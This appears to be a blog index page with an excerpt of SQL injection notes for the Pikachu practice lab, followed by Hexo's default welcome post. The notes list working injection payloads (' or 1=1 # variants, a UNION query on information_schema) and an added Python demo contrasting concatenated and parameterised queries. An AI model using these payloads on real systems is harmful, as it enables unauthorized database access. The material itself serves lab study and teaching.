pikachu SQL injection
Numeric-type test:
$id=$_POST['id']
select field1,field2 from table_name where id = 1 or 1=1;
String-type test:
$uname=$_GET['username']
select field1,field2 from table_name where username='kobe' or 1=1#';
Search-type test:
like '%%'
xxxx%' or 1=1 #
xx-type test:
=('')
xx') or 1=1 #
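The four query shapes above, as an added example that is not part of the original notes: each one is built once by string concatenation and once with a bound parameter, then run with the inputs listed above. It assumes Python's sqlite3 in place of the lab's PHP and MySQL, so the trailing comment marker is -- rather than #; the sample rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed rows; table and column names follow the member query in the notes.
    db = sqlite3.connect(":memory:")
    db.execute("create table member (id integer, username text, email text)")
    db.executemany("insert into member values (?,?,?)", [
        (1, "vince", "vince@example.test"),
        (2, "allen", "allen@example.test"),
        (3, "kobe", "kobe@example.test")])
    return db

# Per context: (template filled by string formatting, template with a bound parameter)
CONTEXTS = {
    "numeric": ("select id,email from member where id = {}",
                "select id,email from member where id = ?"),
    "string": ("select id,email from member where username = '{}'",
               "select id,email from member where username = ?"),
    "search": ("select id,email from member where username like '%{}%'",
               "select id,email from member where username like '%' || ? || '%'"),
    "xx": ("select id,email from member where username = ('{}')",
           "select id,email from member where username = (?)"),
}

# The inputs from the notes, with SQLite's "--" in place of MySQL's "#".
NOTE_INPUTS = {
    "numeric": "1 or 1=1",
    "string": "kobe' or 1=1 --",
    "search": "xxxx%' or 1=1 --",
    "xx": "xx') or 1=1 --",
}

def rows_concatenated(db, context, value):
    # Vulnerable pattern: the request value becomes part of the SQL text.
    return db.execute(CONTEXTS[context][0].format(value)).fetchall()

def rows_bound(db, context, value):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    return db.execute(CONTEXTS[context][1], (value,)).fetchall()

def compare(inputs=NOTE_INPUTS):
    # Row counts per context: (concatenated, bound).
    db = make_db()
    return {c: (len(rows_concatenated(db, c, v)), len(rows_bound(db, c, v)))
            for c, v in inputs.items()}

if __name__ == "__main__":
    for context, counts in compare().items():
        print(context, counts)
```

With concatenation every context returns the whole table; with bound parameters the same inputs match no row, while ordinary values such as kobe still return their single row.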
#Get table names:
select id,email from member where username = 'kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu';
test payload:
kobe' union select table_schema,table_name from information ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick Start
Create a new post
$ hexo new "My New Post"
More info: Writing
Run server
$ hexo server
More info: Server
Generate static files
$ hexo generate
More info: Generating
Deploy to remote sites
$ hexo deploy
More info: Deployment